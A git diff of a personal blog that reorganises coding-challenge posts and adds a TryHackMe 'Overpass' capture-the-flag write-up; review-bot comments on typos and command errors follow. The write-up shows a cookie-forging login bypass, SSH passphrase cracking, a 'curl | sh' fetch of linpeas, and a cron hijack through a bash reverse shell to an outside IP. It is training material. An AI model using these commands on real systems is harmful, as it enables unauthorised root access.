diff --git a/content/en/posts/BinarySearch.md b/content/en/posts/BinarySearch.md index e347ff7..0490451 100755 --- a/content/en/posts/BinarySearch.md +++ b/content/en/posts/BinarySearch.md @@ -139,4 +139,4 @@ mid = (left + right) // 2 # Floor Division mid = (left + right) / 2 # Division ``` -There are 2 posts on this searching algorithms on this site here: [Leetcode Binary Search]({{< ref "posts/Leetcode-BinarySearch704.md" >}}) and [Leetcode First Bad Version 278]( {{< ref "posts/Leetcode-FirstBadVersion278.md" >}} ) +There are 2 posts on this searching algorithms on this site here: [Leetcode Binary Search]({{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}) and [Leetcode First Bad Version 278]( {{< ref "posts/leetcode/Leetcode-FirstBadVersion278.md" >}} ) diff --git a/content/en/posts/TryHackMe/2023-12-23-Overpass.md b/content/en/posts/TryHackMe/2023-12-23-Overpass.md new file mode 100755 index 0000000..eeb7c78 --- /dev/null +++ b/content/en/posts/TryHackMe/2023-12-23-Overpass.md 
@@ -0,0 +1,186 @@ +--- +layout: post +title: TryHackMe - Overpass +date: '2023-12-23 10:29:32 +0800' +categories: [CTF, TryHackMe] +tags: [ctf,tryhackme] +math: true +libraries: + - mathjax +math: true +description: Overpass Room in TryHackMe +--- + +# Description + +What happens when a group of broke Computer Science students try to make a password manager? + +Obviously a perfect commercial success! + +# Enumeration + +### Nmap Scan + +```bash +nmap -p- -T5 $IP +``` + +```text +Nmap scan report for 10.10.88.227 +Host is up (0.19s latency). +Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response) +PORT STATE SERVICE +22/tcp open ssh +80/tcp open http +``` + +### Dirbuster Scan + +{{< img src="/images/Overpass/Dirbuster.png" title="Dirbuster Scan" caption="Administrator Page found!" alt="" width="700px" position="center" >}} + +Looks like there is a route to `http://10.10.88.227/admin.html`. + +Inspecting the sources (`login.js`), we can see the vulnerable code block: + +{{< img src="/images/Overpass/Vulnerable_code.png" title="Vulnerable Code Block" caption="Look at the `else` block" alt="" width="700px" position="center" >}} + +The `if-else` blocks only checks for "Incorrect Credentials" in the POST response, we could probably modify the response via Burpsuite to force a creation of a `SessionToken` cookie (or manually create 1 ourselves). 
+ +# Burpsuite Intercept + +{{< img src="/images/Overpass/Burpsuite_Req.png" title="Burpsuite" caption="Modify Burpsuite Response" alt="" width="700px" position="center" >}} + +Intercepting the traffic, we can get the `Response to this request` in the ui: + +{{< img src="/images/Overpass/Burpsuite_mod_response.png" title="Burpsuite" caption="Response to this request" alt="" width="700px" position="center" >}} + +Forwarding the traffic, we can see the modified response + +{{< img src="/images/Overpass/Burpsuite_mod_response_recv.png" title="Burpsuite" caption="Modified Request" alt="" width="700px" position="center" >}} + +We can then try to refresh the page in Burpsuite's Browser and find that we are logged in! + +{{< img src="/images/Overpass/Overpass_Login_landing.png" title="Overpass" caption="Successful Login!" alt="" width="700px" position="center" >}} + +We can see that a `SessionToken` cookie is created in the browser +{{< img src="/images/Overpass/Mod_session_cookie.png" title="Burpsuite" caption="Modified Session Key" alt="" width="700px" position="center" >}} + +Looks like an SSH RSA Private Key. We might be able to use this to access the server? 
+ +# SSH + +Trying this: +```bash +ssh -i james@$IP +``` + +I get the following response: + +{{< img src="/images/Overpass/failed_ssh.png" title="SSH" caption="SSH Requires a passphrase" alt="" width="700px" position="center" >}} + +## Cracking the SSH key passphrase + +I first used `ssh2john` to convert it to a key hash: +```bash +ssh2john james.key > james.key.hash +``` + +Removing the `rsa.key:` from the hash, and using hashcat to identify the id of the hash to crack: + +{{< img src="/images/Overpass/key_to_hash.png" title="SSH" caption="Hash Generation and Identification" alt="" width="700px" position="center" >}} + +I then use `hashcat` to crack the hash with the `rockyou` wordlist: + +```bash +hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt +``` + +{{< img src="/images/Overpass/cracked_key.png" title="SSH" caption="Cracked Key!" alt="" width="700px" position="center" >}} + +Passphrase: `james13` + +## Login attempt +Using the same command, I tried to SSH into the machine with the key and passphrase: + +{{< img src="/images/Overpass/successful_ssh.png" title="SSH" caption="Successful Login with the passphrase!" alt="" width="700px" position="center" >}} + +We got the user flag: + +```text +thm{65c1aaf000506e56996822c6281e6bf7} +``` + +# Privilege Escalation + +Using Linpeas, we can find possible routes to privilige escalation. 
Following [this tutorial](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS#quick-start), I started a webserver in the host machine and curl-ed the script in the victim machine: + +```bash +curl $HOST-IP/linpeas.sh | sh +``` + +### Crontab + +{{< img src="/images/Overpass/linpeas_crontab.png" title="Linpeas" caption="Crontab" alt="" width="700px" position="center" >}} + +Looks like the final line in the crontab runs as `root`, getting a bash script from a particular server and executing it + +### Hosts File + +{{< img src="/images/Overpass/linpeas_host_file.png" title="Linpeas" caption="Host File" alt="" width="700px" position="center" >}} + +The hosts file seems to be writable by everyone. Looks like I could modify the `overpass.thm` in the hosts file to do a callback to the host machine to run a malicious callback script. + +## Escalation Process + +We first created the necessary directories and `buildscript.sh` file: + +```bash +mkdir downloads +mkdir downloads/src +vim downloads/src/buildscript.sh +# Create the file with this as content: +# bash -i >& /dev/tcp/HOST-IP/5555 0>&1 +# bash -i >& /dev/tcp/10.17.101.177/5555 0>&1 + +# Just in case (Probably don't have to do this) +chmod +x downloads/src/buildscript.sh +``` + +and also started 2 servers: +```bash +# Start the netcat listener +nc -lvnup 5555 + +# Python Http Server +# sudo python3 -m http.server 80 + +# Python2 Http Server +python2 -m SimpleHTTPServer 80 +``` +It doesn't seem like the Python3 server works, so I used python2 with `SimpleHTTPServer` instead.. 
(More info later) + +The script used was a `bash reverse shell`, folloing the tutorial [here](https://ioflood.com/blog/bash-reverse-shell/), I created the file with this as the content: + +```text +#!/bin/bash + +bash -i >& /dev/tcp/10.17.101.177/5555 0>&1 +``` + +In the Victim Machine, I modified the hosts file +```text +10.17.101.177 overpass.thm +``` + +{{< img src="/images/Overpass/modified_hosts.png" title="Hosts File" caption="Modifed Hosts file in victim machine" alt="" width="700px" position="center" >}} + +And then we wait.. The script will be executed after the request from crontab. + +{{< img src="/images/Overpass/python_web_server.png" title="Python Web Server" caption="Python3 doesn't seem to work" alt="" width="700px" position="center" >}} + +After a few seconds, we get a reverse shell running as root! We can get the root flag from the current directory: + +{{< img src="/images/Overpass/root_flag.png" title="Root" caption="Root Flag!" alt="" width="700px" position="center" >}} + +We can see that we are root, the `root.txt` flag is in the directory and we can get the root flag! + diff --git a/content/en/posts/2022-11-13-SumOf5DigitNo.md b/content/en/posts/hackerrank/2022-11-13-SumOf5DigitNo.md similarity index 100% rename from content/en/posts/2022-11-13-SumOf5DigitNo.md rename to content/en/posts/hackerrank/2022-11-13-SumOf5DigitNo.md diff --git a/content/en/posts/2022-11-19-hackerrank-printing-tokens.md b/content/en/posts/hackerrank/2022-11-19-hackerrank-printing-tokens.md similarity index 100% rename from content/en/posts/2022-11-19-hackerrank-printing-tokens.md rename to content/en/posts/hackerrank/2022-11-19-hackerrank-printing-tokens.md 
diff --git a/content/en/posts/2022-11-19-hackerrank-sherlock-and-divisors.md b/content/en/posts/hackerrank/2022-11-19-hackerrank-sherlock-and-divisors.md similarity index 100% rename from content/en/posts/2022-11-19-hackerrank-sherlock-and-divisors.md rename to content/en/posts/hackerrank/2022-11-19-hackerrank-sherlock-and-divisors.md diff --git a/content/en/posts/2022-11-20-hackerrank-handshake.md b/content/en/posts/hackerrank/2022-11-20-hackerrank-handshake.md similarity index 100% rename from content/en/posts/2022-11-20-hackerrank-handshake.md rename to content/en/posts/hackerrank/2022-11-20-hackerrank-handshake.md diff --git a/content/en/posts/2022-11-20-hackerrank-project-euler-1-multiples-of-3-and-5.md b/content/en/posts/hackerrank/2022-11-20-hackerrank-project-euler-1-multiples-of-3-and-5.md similarity index 100% rename from content/en/posts/2022-11-20-hackerrank-project-euler-1-multiples-of-3-and-5.md rename to content/en/posts/hackerrank/2022-11-20-hackerrank-project-euler-1-multiples-of-3-and-5.md diff --git a/content/en/posts/2022-11-21-hackerrank-minimum-height-triangle.md b/content/en/posts/hackerrank/2022-11-21-hackerrank-minimum-height-triangle.md similarity index 100% rename from content/en/posts/2022-11-21-hackerrank-minimum-height-triangle.md rename to content/en/posts/hackerrank/2022-11-21-hackerrank-minimum-height-triangle.md diff --git a/content/en/posts/2022-11-18-leetcode-convert-the-temperature.md b/content/en/posts/leetcode/2022-11-18-leetcode-convert-the-temperature.md similarity index 100% rename from content/en/posts/2022-11-18-leetcode-convert-the-temperature.md rename to content/en/posts/leetcode/2022-11-18-leetcode-convert-the-temperature.md 
diff --git a/content/en/posts/2022-11-18-leetcode-ugly-number-263.md b/content/en/posts/leetcode/2022-11-18-leetcode-ugly-number-263.md similarity index 100% rename from content/en/posts/2022-11-18-leetcode-ugly-number-263.md rename to content/en/posts/leetcode/2022-11-18-leetcode-ugly-number-263.md diff --git a/content/en/posts/2022-11-19-leetcode-concatenation-of-array-1929.md b/content/en/posts/leetcode/2022-11-19-leetcode-concatenation-of-array-1929.md similarity index 100% rename from content/en/posts/2022-11-19-leetcode-concatenation-of-array-1929.md rename to content/en/posts/leetcode/2022-11-19-leetcode-concatenation-of-array-1929.md diff --git a/content/en/posts/2022-11-19-leetcode-two-sums-1.md b/content/en/posts/leetcode/2022-11-19-leetcode-two-sums-1.md similarity index 100% rename from content/en/posts/2022-11-19-leetcode-two-sums-1.md rename to content/en/posts/leetcode/2022-11-19-leetcode-two-sums-1.md diff --git a/content/en/posts/Leetcode-BinarySearch704.md b/content/en/posts/leetcode/Leetcode-BinarySearch704.md similarity index 100% rename from content/en/posts/Leetcode-BinarySearch704.md rename to content/en/posts/leetcode/Leetcode-BinarySearch704.md diff --git a/content/en/posts/Leetcode-FirstBadVersion278.md b/content/en/posts/leetcode/Leetcode-FirstBadVersion278.md similarity index 87% rename from content/en/posts/Leetcode-FirstBadVersion278.md rename to content/en/posts/leetcode/Leetcode-FirstBadVersion278.md index f664154..f3c5c19 100755 --- a/content/en/posts/Leetcode-FirstBadVersion278.md +++ b/content/en/posts/leetcode/Leetcode-FirstBadVersion278.md 
@@ -59,7 +59,7 @@ Explanation: 2 does not exist in nums so return -1 # Process -Using a binary search done in [Leetcode Binary Search 704]( {{< ref "posts/Leetcode-BinarySearch704.md" >}}), I was able to get the first bad version. +Using a binary search done in [Leetcode Binary Search 704]( {{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}), I was able to get the first bad version. First, I initialised my `left` variable to `1` as the lower limit was `1` and I couldn't start from 0. I initialised right to be `n` for the number of versions. @@ -95,4 +95,4 @@ class Solution: # Afterthoughts -This is almost a duplicate of [Leetcode Binary Search 704]( {{< ref "posts/Leetcode-BinarySearch704.md" >}}), where binary search is used as the most efficient algorithm, splitting the sorted array into half each time through the iteration to search for the values required. I need more practice to be familiar and comfortable with these searching algorithms. +This is almost a duplicate of [Leetcode Binary Search 704]( {{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}), where binary search is used as the most efficient algorithm, splitting the sorted array into half each time through the iteration to search for the values required. I need more practice to be familiar and comfortable with these searching algorithms. diff --git a/content/en/posts/leetcode-DefangIP.md b/content/en/posts/leetcode/leetcode-DefangIP.md similarity index 100% rename from content/en/posts/leetcode-DefangIP.md rename to content/en/posts/leetcode/leetcode-DefangIP.md diff --git a/content/en/posts/2022-10-12-picoctf-mod-26.md b/content/en/posts/picoctf/2022-10-12-picoctf-mod-26.md similarity index 100% rename from content/en/posts/2022-10-12-picoctf-mod-26.md rename to content/en/posts/picoctf/2022-10-12-picoctf-mod-26.md 
diff --git a/content/en/posts/2022-10-12-picoctf-obedient-cat.md b/content/en/posts/picoctf/2022-10-12-picoctf-obedient-cat.md similarity index 100% rename from content/en/posts/2022-10-12-picoctf-obedient-cat.md rename to content/en/posts/picoctf/2022-10-12-picoctf-obedient-cat.md diff --git a/content/en/posts/2022-11-18-picoctf-wave-a-flag.md b/content/en/posts/picoctf/2022-11-18-picoctf-wave-a-flag.md similarity index 100% rename from content/en/posts/2022-11-18-picoctf-wave-a-flag.md rename to content/en/posts/picoctf/2022-11-18-picoctf-wave-a-flag.md diff --git a/static/images/Overpass/Burpsuite_Req.png b/static/images/Overpass/Burpsuite_Req.png new file mode 100644 index 0000000..b6be9c7 Binary files /dev/null and b/static/images/Overpass/Burpsuite_Req.png differ diff --git a/static/images/Overpass/Burpsuite_mod_response.png b/static/images/Overpass/Burpsuite_mod_response.png new file mode 100644 index 0000000..4e5a84a Binary files /dev/null and b/static/images/Overpass/Burpsuite_mod_response.png differ diff --git a/static/images/Overpass/Burpsuite_mod_response_recv.png b/static/images/Overpass/Burpsuite_mod_response_recv.png new file mode 100644 index 0000000..116fd3a Binary files /dev/null and b/static/images/Overpass/Burpsuite_mod_response_recv.png differ diff --git a/static/images/Overpass/Dirbuster.png b/static/images/Overpass/Dirbuster.png new file mode 100644 index 0000000..b8708e9 Binary files /dev/null and b/static/images/Overpass/Dirbuster.png differ diff --git a/static/images/Overpass/Mod_session_cookie.png b/static/images/Overpass/Mod_session_cookie.png new file mode 100644 index 0000000..10dc974 Binary files /dev/null and b/static/images/Overpass/Mod_session_cookie.png differ diff --git a/static/images/Overpass/Overpass_Login_landing.png b/static/images/Overpass/Overpass_Login_landing.png new file mode 100644 index 0000000..e10610e Binary files /dev/null and b/static/images/Overpass/Overpass_Login_landing.png differ 
diff --git a/static/images/Overpass/Vulnerable_code.png b/static/images/Overpass/Vulnerable_code.png new file mode 100644 index 0000000..aa1e87a Binary files /dev/null and b/static/images/Overpass/Vulnerable_code.png differ diff --git a/static/images/Overpass/cracked_key.png b/static/images/Overpass/cracked_key.png new file mode 100644 index 0000000..6cb1e8c Binary files /dev/null and b/static/images/Overpass/cracked_key.png differ diff --git a/static/images/Overpass/failed_ssh.png b/static/images/Overpass/failed_ssh.png new file mode 100644 index 0000000..5784e82 Binary files /dev/null and b/static/images/Overpass/failed_ssh.png differ diff --git a/static/images/Overpass/key_to_hash.png b/static/images/Overpass/key_to_hash.png new file mode 100644 index 0000000..c786884 Binary files /dev/null and b/static/images/Overpass/key_to_hash.png differ diff --git a/static/images/Overpass/linpeas_crontab.png b/static/images/Overpass/linpeas_crontab.png new file mode 100644 index 0000000..7c670fc Binary files /dev/null and b/static/images/Overpass/linpeas_crontab.png differ diff --git a/static/images/Overpass/linpeas_host_file.png b/static/images/Overpass/linpeas_host_file.png new file mode 100644 index 0000000..697f3c6 Binary files /dev/null and b/static/images/Overpass/linpeas_host_file.png differ diff --git a/static/images/Overpass/modified_hosts.png b/static/images/Overpass/modified_hosts.png new file mode 100644 index 0000000..66f3bf6 Binary files /dev/null and b/static/images/Overpass/modified_hosts.png differ diff --git a/static/images/Overpass/python_web_server.png b/static/images/Overpass/python_web_server.png new file mode 100644 index 0000000..302dcc0 Binary files /dev/null and b/static/images/Overpass/python_web_server.png differ diff --git a/static/images/Overpass/root_flag.png b/static/images/Overpass/root_flag.png new file mode 100644 index 0000000..30410b9 Binary files /dev/null and b/static/images/Overpass/root_flag.png differ 
diff --git a/static/images/Overpass/successful_ssh.png b/static/images/Overpass/successful_ssh.png new file mode 100644 index 0000000..4b4417b Binary files /dev/null and b/static/images/Overpass/successful_ssh.png differ
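Review bot: the rewritten line in the `BinarySearch.md` hunk keeps the ungrammatical `There are 2 posts on this searching algorithms on this site here:`; since the line is being touched anyway for the new `posts/leetcode/` paths, consider `There are 2 posts on this searching algorithm on this site:`. The two updated `ref` paths themselves are consistent with the renames later in the patch (`Leetcode-BinarySearch704.md` and `Leetcode-FirstBadVersion278.md` both move under `content/en/posts/leetcode/`).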
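Review bot: in the new `2023-12-23-Overpass.md`, the listener and the callback do not match: `nc -lvnup 5555` opens a UDP listener (`-u`), but `buildscript.sh` connects with `bash -i >& /dev/tcp/10.17.101.177/5555 0>&1`, which is TCP, so that listener would never receive the connection; drop `-u` (`nc -lvnp 5555`) so the command shown is the one that produced the screenshot. A few other lines in the same file need a pass: `ssh -i james@$IP` is missing the key path after `-i` (`ssh -i james.key james@$IP`, matching the `james.key` used in the `ssh2john` step), and because the text later says "Using the same command" the error propagates; `curl $HOST-IP/linpeas.sh | sh` expands `$HOST` and appends `-IP` if pasted literally, so use one placeholder form consistently (`<HOST-IP>`, or a variable such as `$HOST_IP`; the `buildscript.sh` comment writes `HOST-IP` with no `$` at all); the hash-cleanup sentence says to remove `rsa.key:` but the file written by `ssh2john james.key` is prefixed `james.key:`; the front matter declares `math: true` twice (before and after `libraries:`), which some YAML parsers reject as a duplicate key; and the "(More info later)" after the Python3 `http.server` remark is never followed up, so either add the explanation or drop the promise. Minor typos: `privilige`, `folloing`, `Modifed`, and `The if-else blocks only checks` should be `block only checks`.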